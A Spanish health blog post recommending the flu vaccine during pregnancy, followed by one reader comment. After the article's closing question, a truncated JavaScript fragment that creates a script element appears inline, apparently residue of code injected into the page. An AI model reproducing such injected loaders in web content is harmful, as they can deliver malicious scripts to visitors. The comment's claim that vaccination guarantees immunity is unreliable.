Salud y belleza » Embarazo, Medicina, Niños, Salud

Las embarazadas y la vacuna de la gripe

1 Comentario

vacuna-gripe-embarazadaLos médicos recomiendan a las embarazadas ponerse la vacuna de la gripe, puesto que genera muchos más beneficios que riesgos. Aseguran que para una embarazada los efectos de la gripe podrían ser más graves, por lo que la vacuna protegería tanto a ella como al bebe. Además, aseguran que es una vacuna segura en cualquier trimestre del embarazo. Incluso la Organización Mundial de la Salud la recomienda por la vulnerabilidad de la embarazada y de los recién nacidos.

Se calcula que en España solo un 20% de las mujeres embarazadas se vacuna, lo que los expertos toman como una cifra demasiado baja. Sin embargo, la vacuna de la gripe es muy eficaz para evitar episodios cardiorrespiratorios atribuidos a la gripe que son más frecuentes en las embarazadas.

Por otro lado, la vacuna antigripal en las embarazadas ayuda a reducir los cuadros de gripe durante el embarazo, por lo que disminuye la infección gripal en los hijos. Esto es muy importante teniendo en cuenta que los bebés no pueden ser vacunados hasta los 6 meses.

Las consecuencias de contraer la gripe durante el embarazo no tienen tanto que ver con las infecciones del feto sino con complicaciones funcionales diversas relacionadas con los niños de bajo peso o menor desarrollo, parto prematuro, muerte o parto urgente por cesárea. Además, la vacuna antigripal ayuda a proteger al niño los primeros seis meses de vida, ya que entonces no se les puede vacunar.

Por tanto, se acabó el mito de que las mujeres embarazadas no pueden ponerse la vacuna contra la gripe. Queda suficientemente demostrado que la vacuna antigripal tiene muchos más beneficios que riesgos para la madre y, sobre todo, para el bebé.

¿Estás embarazada? ¿Te has puesto la vacuna contra la gripe?var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

One Comment »

  • Salva said:

    Yo estoy de acuerdo con que las mujeres se pongan la vacuna de la gripe. A mi prima se le murió el bebé con un mes de gripe… si se la hubiera puesto no habría pasado porque sería inmune. No sean tontas mujeres!!!

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.